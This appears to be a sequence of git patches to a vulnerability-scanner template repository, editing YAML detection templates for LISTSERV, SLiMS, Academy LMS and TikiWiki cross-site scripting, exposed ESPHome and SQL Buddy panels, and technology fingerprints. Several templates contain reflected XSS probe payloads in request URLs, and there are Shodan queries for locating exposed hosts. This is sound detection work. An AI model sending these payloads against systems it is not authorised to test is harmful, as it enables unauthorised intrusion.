matchers: - - type: status - status: - - 200 - - type: word words: - "" + - "LISTSERV" + condition: and + case-insensitive: true + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From cecab21862544febf1563dade8f82afa367fc39d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 05:48:15 +0000 Subject: [PATCH 1095/1133] Auto Generated New Template Addition List [Mon Jan 23 05:48:15 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c3eb8f0628..cf7a6bb15b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ cves/2022/CVE-2022-1168.yaml vulnerabilities/other/sound4-file-disclosure.yaml +"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml" From b37212ce3cdced4d60d23c7fca6d45efad0bb403 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 11:20:08 +0530 Subject: [PATCH 1096/1133] updated payload --- cves/2022/CVE-2022-39195.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-39195.yaml b/cves/2022/CVE-2022-39195.yaml index 32e557875e..7475bf72b9 100644 --- a/cves/2022/CVE-2022-39195.yaml +++ b/cves/2022/CVE-2022-39195.yaml @@ -19,15 +19,15 @@ info: requests: - method: GET path: - - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E" - - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E" + - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - "" + - "" - "LISTSERV" condition: and case-insensitive: true From 2170a70a6e93f6210d9ae8b38221887ce50e9f96 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 11:23:14 +0530 Subject: [PATCH 1097/1133] description-update --- cves/2022/CVE-2022-39195.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-39195.yaml b/cves/2022/CVE-2022-39195.yaml index 7475bf72b9..5ae430505a 100644 --- a/cves/2022/CVE-2022-39195.yaml +++ b/cves/2022/CVE-2022-39195.yaml @@ -5,7 +5,7 @@ info: author: arafatansari severity: medium description: | - LISTSERV version 17 suffers from a cross site scripting vulnerability + A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter. reference: - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2022-39195 From 28a3e471d07d5e35d0bc4f8b308f924109b17652 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 23 Jan 2023 11:39:18 +0530 Subject: [PATCH 1098/1133] shodan query -update --- exposed-panels/sqlbuddy-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/sqlbuddy-panel.yaml b/exposed-panels/sqlbuddy-panel.yaml index f2f26c8816..a20c81eeb9 100644 --- a/exposed-panels/sqlbuddy-panel.yaml +++ b/exposed-panels/sqlbuddy-panel.yaml @@ -10,7 +10,7 @@ info: - http://sqlbuddy.com/ metadata: verified: true - shodan-query: http.html:"sqlbuddy" || http.title:"SQL Buddy" + shodan-query: http.title:"SQL Buddy" tags: panel,sqlbuddy requests: @@ -27,4 +27,4 @@ requests: dsl: - "status_code == 200" - "contains(body, 'SQL Buddy')" - condition: and \ No newline at end of file + condition: and From 7f9f1850ab36e6f673fdb2de27abafd3ff3cdca9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 23 Jan 2023 11:43:13 +0530 Subject: [PATCH 1099/1133] remove / --- exposed-panels/sqlbuddy-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/sqlbuddy-panel.yaml b/exposed-panels/sqlbuddy-panel.yaml index a20c81eeb9..fefec1ddfa 100644 --- a/exposed-panels/sqlbuddy-panel.yaml +++ b/exposed-panels/sqlbuddy-panel.yaml @@ -16,7 +16,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/sqlbuddy/" stop-at-first-match: true From 506bca4415a7290a9a55dc0c252f9a06a2756d27 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 12:55:34 +0530 Subject: [PATCH 1100/1133] merge with duplicate and updated metadata --- cves/2019/CVE-2019-15501.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 8fb0d3fd1d..dd004dd531 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -2,9 +2,10 @@ id: CVE-2019-15501 info: name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting - author: LogicalHunter + author: LogicalHunter,arafatansari severity: medium - description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter. + description: | + L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter. reference: - https://www.exploit-db.com/exploits/47302 - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf @@ -14,6 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15501 cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.html:"LISTSERV" tags: cve,cve2019,xss,listserv,edb requests: @@ -24,9 +28,12 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '</script><script>alert(document.domain)</script>' - part: body + - 'LISTSERV' + condition: and + case-insensitive: true - type: word part: header From 313b22933c05e8ec8983b979eb94c00d53eaf1ec Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 12:56:13 +0530 Subject: [PATCH 1101/1133] deleted duplicate --- cves/2019/CVE-2019-15501 | 34 ---------------------------------- 1 file changed, 34 deletions(-) delete mode 100644 cves/2019/CVE-2019-15501 diff --git a/cves/2019/CVE-2019-15501 b/cves/2019/CVE-2019-15501 deleted file mode 100644 index 8fd7687bc7..0000000000 --- a/cves/2019/CVE-2019-15501 +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2019-15501 - -info: - name: LSoft ListServ < 16.5-2018a - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 - - https://packetstormsecurity.com/files/154202/LSoft-ListServ-Cross-Site-Scripting.html - - https://www.exploit-db.com/exploits/47302 - - https://www.tenable.com/cve/CVE-2019-15501 - metadata: - shodan-query: http.html:"LISTSERV" - verified: "true" - tags: cve,cve2019,xss,listserv - -requests: - - method: GET - path: - - "{{BaseURL}}/scripts/wa.exe?OK=%3Cscript%3Ealert(document.domain)%3C/script%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "<script>alert(document.domain)</script>" - - "LISTSERV" - condition: and - - - type: status - status: - - 200 From 9aa77a4e0924c2ef624cf1af49d0739847c04729 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 13:08:09 +0530 Subject: [PATCH 1103/1133] updated matchers --- vulnerabilities/other/slims-xss.yaml | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/vulnerabilities/other/slims-xss.yaml b/vulnerabilities/other/slims-xss.yaml index 9a73a9d2c3..1bb21de1fb 100644 --- a/vulnerabilities/other/slims-xss.yaml +++ b/vulnerabilities/other/slims-xss.yaml @@ -1,7 +1,7 @@ id: slims-xss info: - name: Senayan Library Management System v9.4.0 a.k.a SLIMS 9 - Access Control + name: Senayan Library Management System v9.4.0(SLIMS 9) - Cross Site Scripting author: arafatansari severity: medium description: | @@ -9,22 +9,28 @@ info: reference: - https://packetstormsecurity.com/files/170182/Senayan-Library-Management-System-9.4.0-Cross-Site-Scripting.html metadata: - shodan-query: http.html:"SLIMS" verified: "true" - tags: xss,slims + shodan-query: http.html:"SLIMS" + tags: xss,slims,senayan requests: - - raw: - - | - GET /index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(1)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member" matchers-condition: and matchers: + - type: word + words: + - '<script>alert(document.domain)</script>' + - 'SLiMS' + condition: and + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - '<script>alert(1)</script>' From f7da6d8b3352f244ad466c24ad11c03704731af6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 23 Jan 2023 07:48:36 +0000 Subject: [PATCH 1104/1133] Auto Generated CVE annotations [Mon Jan 23 07:48:36 UTC 2023] :robot: --- cves/2019/CVE-2019-15501.yaml | 2 +- vulnerabilities/other/sound4-file-disclosure.yaml | 2 +- ‎‎misconfiguration/sound4-directory-listing.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index dd004dd531..1fde1384e7 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -16,8 +16,8 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 metadata: - verified: "true" shodan-query: http.html:"LISTSERV" + verified: "true" tags: cve,cve2019,xss,listserv,edb requests: diff --git a/vulnerabilities/other/sound4-file-disclosure.yaml b/vulnerabilities/other/sound4-file-disclosure.yaml index 4f3eb559d2..cde55a1f8c 100644 --- a/vulnerabilities/other/sound4-file-disclosure.yaml +++ b/vulnerabilities/other/sound4-file-disclosure.yaml @@ -12,7 +12,7 @@ info: metadata: shodan-query: http.html:"SOUND4" verified: "true" - tags: lfi,sound4,unauth,disclosure + tags: packetstorm,lfi,sound4,unauth,disclosure requests: - method: GET diff --git a/‎‎misconfiguration/sound4-directory-listing.yaml b/‎‎misconfiguration/sound4-directory-listing.yaml index cdb8441a09..2327c8ab87 100644 --- a/‎‎misconfiguration/sound4-directory-listing.yaml +++ b/‎‎misconfiguration/sound4-directory-listing.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true shodan-query: http.html:"SOUND4" - tags: misconfig,listing,sound4,disclosure + tags: misconfig,listing,sound4,disclosure,packetstorm requests: - method: GET From 2117f7b8b6684a65197e9b5ca6da8f5efe154657 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 13:20:14 +0530 Subject: [PATCH 1105/1133] updated matcher,added metadata --- exposed-panels/esphome-panel.yaml | 21 +++++++-------------- 1 file changed, 7 insertions(+), 14 deletions(-) diff --git a/exposed-panels/esphome-panel.yaml b/exposed-panels/esphome-panel.yaml index 846f98eb71..1feeb0c296 100644 --- a/exposed-panels/esphome-panel.yaml +++ b/exposed-panels/esphome-panel.yaml @@ -1,32 +1,25 @@ id: esphome-panel info: - name: ESPHome Panel - Detect + name: ESPHome Panel Detect author: fabaff severity: info - description: ESPHome panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: tech,panel,esphome,iot + metadata: + verified: true + shodan-query: title:"Login - ESPHome" + tags: panel,esphome,iot requests: - method: GET path: - - '{{BaseURL}}' + - '{{BaseURL}}/login' matchers-condition: and matchers: - type: word part: body words: - - "<title>Dashboard - ESPHome" - - - type: word - part: body - words: - - "" + - 'class="esphome-header' - type: status status: From ec0773bf5e1a123686d8efadbc662e1f9fcd811d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 13:25:05 +0530 Subject: [PATCH 1106/1133] Create esphome-dashboard.yaml --- misconfiguration/esphome-dashboard.yaml | 26 +++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 misconfiguration/esphome-dashboard.yaml diff --git a/misconfiguration/esphome-dashboard.yaml b/misconfiguration/esphome-dashboard.yaml new file mode 100644 index 0000000000..6963619ef1 --- /dev/null +++ b/misconfiguration/esphome-dashboard.yaml @@ -0,0 +1,26 @@ +id: esphome-dashboard + +info: + name: ESPHome Dashboard Exposure + author: ritikchaddha + severity: medium + metadata: + verified: true + shodan-query: title:"Dashboard - ESPHome" + tags: misconfig,esphome,exposure,iot + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Dashboard - ESPHome' + + - type: status + status: + - 200 From 6843a66e924f71c6429f05c930f5be6f3b3b4846 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 13:30:27 +0530 Subject: [PATCH 1107/1133] added description --- misconfiguration/esphome-dashboard.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/misconfiguration/esphome-dashboard.yaml b/misconfiguration/esphome-dashboard.yaml index 6963619ef1..9d595aed7e 100644 --- a/misconfiguration/esphome-dashboard.yaml +++ b/misconfiguration/esphome-dashboard.yaml @@ -4,6 +4,8 @@ info: name: ESPHome Dashboard Exposure author: ritikchaddha severity: medium + description: | + ESPHome Dashboard exposes the secrets like wifi password,api keys and internal logs, it also allows users to make changes through the dashboard. metadata: verified: true shodan-query: title:"Dashboard - ESPHome" From 842ab6f258513da48bd267e7a218cba6b8753de3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 23 Jan 2023 13:58:56 +0530 Subject: [PATCH 1108/1133] Update auto_assign.yml --- .github/auto_assign.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/auto_assign.yml b/.github/auto_assign.yml index 812e1b874b..3561d73ecf 100644 --- a/.github/auto_assign.yml +++ b/.github/auto_assign.yml @@ -9,7 +9,6 @@ reviewers: - ritikchaddha - DhiyaneshGeek - pussycat0x - - princechaddha # A number of reviewers added to the pull request # Set 0 to add all the reviewers (default: 0) @@ -17,9 +16,9 @@ numberOfReviewers: 1 # A list of assignees, overrides reviewers if set assignees: - - ritikchaddha - DhiyaneshGeek - pussycat0x + - ritikchaddha # A number of assignees to add to the pull request # Set to 0 to add all of the assignees. From 3c52e11fba92835c7fda1387cf6ca3daedda14ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 14:19:13 +0530 Subject: [PATCH 1111/1133] Revert "Add detection support for uvicorn" --- technologies/tech-detect.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 7b015ddc6e..11e76fbd7f 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3677,12 +3677,7 @@ requests: - "X-Powered-By: Sails" - type: word - name: uvicorn - part: header - words: - - "uvicorn" - name: tornado part: header words: - - "TornadoServer/" \ No newline at end of file + - "TornadoServer/" From 3c86e551da49cc6ba00f5223ab78a8c384806d8b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 14:24:57 +0530 Subject: [PATCH 1112/1133] Update tech-detect.yaml --- technologies/tech-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 11e76fbd7f..f73f27048d 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3681,3 +3681,9 @@ requests: part: header words: - "TornadoServer/" + + - type: word + name: uvicorn + part: server + words: + - "uvicorn" From e48a8f2e1c62542834fd818acf02a9366acaf7c5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 14:29:16 +0530 Subject: [PATCH 1114/1133] updated part --- technologies/tech-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index bfb57f33a0..9163494735 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3678,6 +3678,6 @@ requests: - type: word name: Tengine - part: header + part: server words: - - "Server: Tengine" + - "Tengine" From 54d23506ac6a794acb3d1fdf7301f626f8e54096 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 14:46:52 +0530 Subject: [PATCH 1115/1133] updated matchers, added metadata --- exposed-panels/connect-box-login.yaml | 21 +++++++++------------ 1 file changed, 9 insertions(+), 12 deletions(-) diff --git a/exposed-panels/connect-box-login.yaml b/exposed-panels/connect-box-login.yaml index f761b3666c..248d25915e 100644 --- a/exposed-panels/connect-box-login.yaml +++ b/exposed-panels/connect-box-login.yaml @@ -1,15 +1,13 @@ -id: connect-box-login +id: connectbox-panel info: - name: Connect Box Login Panel - Detect + name: Connect Box Login Panel Detect author: fabaff severity: info - description: Connect Box login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: tech,panel,connectbox,iot + metadata: + verified: true + shodan-query: 'NET-DK/1.0' + tags: panel,connectbox,iot requests: - method: GET @@ -18,7 +16,6 @@ requests: host-redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word @@ -26,10 +23,10 @@ requests: words: - "NET-DK/1.0" - - type: word + - type: regex part: header - words: - - "../common_page/login.html" + regex: + - "../common_page/(.*).html" - type: status status: From f017f4c417a4c792e7d9a9f522f95eafb4e22e91 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 09:32:31 +0000 Subject: [PATCH 1116/1133] Auto Generated New Template Addition List [Mon Jan 23 09:32:30 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf7a6bb15b..15ee002675 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ cves/2022/CVE-2022-1168.yaml +exposed-panels/sqlbuddy-panel.yaml vulnerabilities/other/sound4-file-disclosure.yaml "\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml" From c7c29ae515e93c9ec00cb83cd5abc43aaf18169d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 09:33:13 +0000 Subject: [PATCH 1117/1133] Auto Generated New Template Addition List [Mon Jan 23 09:33:13 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 15ee002675..8746bcd73c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2022/CVE-2022-1168.yaml exposed-panels/sqlbuddy-panel.yaml +misconfiguration/esphome-dashboard.yaml vulnerabilities/other/sound4-file-disclosure.yaml "\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml" From 42d751c11af09f0ff251bbbe32a7e5e9476b32a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 09:34:19 +0000 Subject: [PATCH 1118/1133] Auto Generated New Template Addition List [Mon Jan 23 09:34:19 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8746bcd73c..b3f84e9420 100644 --- a/.new-additions +++ b/.new-additions @@ -2,4 +2,5 @@ cves/2022/CVE-2022-1168.yaml exposed-panels/sqlbuddy-panel.yaml misconfiguration/esphome-dashboard.yaml vulnerabilities/other/sound4-file-disclosure.yaml +vulnerabilities/other/tikiwiki-xss.yaml "\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml" From f60dcf0f1956690596cdd43fe29500932c8555fc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 15:17:20 +0530 Subject: [PATCH 1119/1133] added text/html header --- vulnerabilities/other/tikiwiki-xss.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/vulnerabilities/other/tikiwiki-xss.yaml b/vulnerabilities/other/tikiwiki-xss.yaml index 7f1632d6fd..92bb915404 100644 --- a/vulnerabilities/other/tikiwiki-xss.yaml +++ b/vulnerabilities/other/tikiwiki-xss.yaml @@ -29,6 +29,11 @@ requests: - 'Tiki Wiki CMS' condition: and + - type: word + part: header + words: + - "text/html" + - type: status status: - 403 From 095df8edcc43d3aafab47a4bd4705d31589a1708 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 15:24:33 +0530 Subject: [PATCH 1121/1133] updated matchers --- vulnerabilities/other/academy-lms-xss.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/academy-lms-xss.yaml b/vulnerabilities/other/academy-lms-xss.yaml index 65a7a563f8..baefca419a 100644 --- a/vulnerabilities/other/academy-lms-xss.yaml +++ b/vulnerabilities/other/academy-lms-xss.yaml @@ -1,7 +1,7 @@ id: academy-lms-xss info: - name: Academy LMS 5.11 Cross Site Scripting + name: Academy LMS 5.11 - Cross Site Scripting author: arafatansari severity: medium description: | @@ -10,9 +10,9 @@ info: - https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html - https://vulners.com/packetstorm/PACKETSTORM:170514 metadata: - shodan-query: http.html:"Academy LMS" verified: "true" - tags: xss,lms,academy + shodan-query: http.html:"Academy LMS" + tags: lms,academy,xss requests: - method: GET @@ -28,6 +28,11 @@ requests: - 'Academy LMS' condition: and + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 From c81c6782735fe5fb4e2ebf100d6bd2220574c896 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 09:56:31 +0000 Subject: [PATCH 1122/1133] Auto Generated New Template Addition List [Mon Jan 23 09:56:31 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b3f84e9420..f041f88f96 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2022/CVE-2022-1168.yaml +exposed-panels/esphome-panel.yaml exposed-panels/sqlbuddy-panel.yaml misconfiguration/esphome-dashboard.yaml vulnerabilities/other/sound4-file-disclosure.yaml From 04ae70d9c1059d1ee7126d3fc1afb8b9faae3ebe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 09:58:48 +0000 Subject: [PATCH 1123/1133] Auto Generated New Template Addition List [Mon Jan 23 09:58:48 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f041f88f96..e7ed2568aa 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cves/2022/CVE-2022-1168.yaml exposed-panels/esphome-panel.yaml exposed-panels/sqlbuddy-panel.yaml misconfiguration/esphome-dashboard.yaml +vulnerabilities/other/academy-lms-xss.yaml vulnerabilities/other/sound4-file-disclosure.yaml vulnerabilities/other/tikiwiki-xss.yaml "\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml" From 3179a5fa83540a888b7944b69d43b273a4e49335 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 15:37:10 +0530 Subject: [PATCH 1124/1133] fix-template-header --- technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index c54594258e..56e1726ab6 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3678,7 +3678,7 @@ requests: - type: word name: Tengine - part: server + part: header words: - "Tengine" From c66cd8a9dfcb3abfd089568e9c39906873c72e88 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 15:39:02 +0530 Subject: [PATCH 1125/1133] error-fix --- technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 56e1726ab6..8c51aba727 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3677,7 +3677,7 @@ requests: - "X-Powered-By: Sails" - type: word - name: Tengine + name: tornado part: header words: - "Tengine" From 28c1b4ca79e9c86ad8750f9eb73017656b4fa919 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 15:40:55 +0530 Subject: [PATCH 1126/1133] update --- technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 8c51aba727..3a599195e5 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3677,7 +3677,7 @@ requests: - "X-Powered-By: Sails" - type: word - name: tornado + name: tengine part: header words: - "Tengine" From 6d59a72d09a85731cb69f58c1b0b538f214047c7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 23 Jan 2023 15:49:41 +0530 Subject: [PATCH 1128/1133] revert-change --- technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 3a599195e5..c3729b1160 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -3678,7 +3678,7 @@ requests: - type: word name: tengine - part: header + part: server words: - "Tengine" From 162963289b51cf7de91eadc0df647f79b450bb17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 10:19:54 +0000 Subject: [PATCH 1129/1133] Auto Generated New Template Addition List [Mon Jan 23 10:19:54 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e7ed2568aa..228e8c7458 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2022/CVE-2022-1168.yaml +cves/2022/CVE-2022-39195.yaml exposed-panels/esphome-panel.yaml exposed-panels/sqlbuddy-panel.yaml misconfiguration/esphome-dashboard.yaml From 276dcc0f776025d02aac3e8db069ca261526b98d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 10:24:35 +0000 Subject: [PATCH 1131/1133] Auto Generated New Template Addition List [Mon Jan 23 10:24:35 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 228e8c7458..258b30d64a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ cves/2022/CVE-2022-1168.yaml cves/2022/CVE-2022-39195.yaml +exposed-panels/connect-box-login.yaml exposed-panels/esphome-panel.yaml exposed-panels/sqlbuddy-panel.yaml misconfiguration/esphome-dashboard.yaml From 9ff9abcd785b8d84053514e7d312b68e1c41b7be Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 10:27:23 +0000 Subject: [PATCH 1132/1133] Auto Generated New Template Addition List [Mon Jan 23 10:27:23 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 258b30d64a..7ce9ae5556 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ exposed-panels/esphome-panel.yaml exposed-panels/sqlbuddy-panel.yaml misconfiguration/esphome-dashboard.yaml vulnerabilities/other/academy-lms-xss.yaml +vulnerabilities/other/slims-xss.yaml vulnerabilities/other/sound4-file-disclosure.yaml vulnerabilities/other/tikiwiki-xss.yaml "\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml" From 5addb51f6d97d327c29d4a3ae17c2fe71e8ae11d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Jan 2023 10:36:01 +0000 Subject: [PATCH 1133/1133] Auto Generated CVE annotations [Mon Jan 23 10:36:01 UTC 2023] :robot: --- cves/2022/CVE-2022-39195.yaml | 6 ++++-- vulnerabilities/other/academy-lms-xss.yaml | 2 +- vulnerabilities/other/tikiwiki-xss.yaml | 2 +- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-39195.yaml b/cves/2022/CVE-2022-39195.yaml 